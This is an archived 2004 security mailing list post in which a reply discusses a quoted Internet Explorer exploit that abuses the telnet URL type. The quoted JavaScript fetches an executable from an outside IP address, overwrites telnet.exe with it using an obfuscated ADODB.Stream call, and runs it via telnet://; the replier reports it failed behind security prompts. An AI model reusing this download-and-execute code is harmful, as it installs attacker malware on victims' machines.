[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <200407210225.i6L2PXqb029710@cairo.anu.edu.au>
From: avalon at cairo.anu.edu.au (Darren Reed)
Subject: telnet URL type used in exploit
Michael,
Out of curiosity, I tested this with IE 6.0.2800.1106.xpsp2.030422-1633
and got a popup box saying:
"This page is accessing information that is not under its
control. This poses a security risk. Do you want to
continue?" [Yes] [No]
And that was loading it into IE as a *local file*...when I put it on
a web page, I got the usual half dozen alerts about "do you want to run
javascript", etc. that even if I said yes to it didn't work.
Did you get that popup box when you tested your script below ?
Darren
> In reply the discussion found at:
>
> http://seclists.org/lists/fulldisclosure/2004/Jul/0528.html
>
> the consesus seems to be that there are no obvious ways to exploit the
> mentioned URL types, such as tn3270, telnet, LDAP, rlogin etc. While
> these may not be exploitable per se, they certainly are when used in
> conjction with other known exploits. Take the following code for
> example:
>
> var downloadurl="http://213.159.117.133/dl/loadadv74.exe";
>
> if(navigator.appVersion.indexOf("Windows NT 5.1")!=-1)
> savetopath="C:\\WINDOWS\\system32\\telnet.exe";
>
> if(navigator.appVersion.indexOf("Windows NT 5.0")!=-1)
> savetopath="C:\\WINNT\\system32\\telnet.exe";
>
> payloadURL = downloadurl;
>
> var x = new ActiveXObject("Microsoft.XMLHTTP");
> x.Open("GET",payloadURL,0);
> x.Send();
>
> function bla() { return "A" + "D" + "O" + "D" + "B" + "." + "S" + "t"
> + "r" + "e" + "a" + "m"; }
> var s = new ActiveXObject(bla());
>
> s.Mode = 3;
> s.Type = 1;
> s.Open();
> s.Write(x.responseBody);
> s.SaveToFile(savetopath,2);
>
> location.href = "telnet://";
>
> The JavaScript overwrites telnet.exe with a downloaded executable and
> then runs it by pointing the browser at telnet://. Instead of
> launching a telnet shell as expected, the attackers code is executed.
> This is not only an example of the telnet URL type being involved in
> an exploit, but one that actually relies on it.
Powered by blists - more mailing lists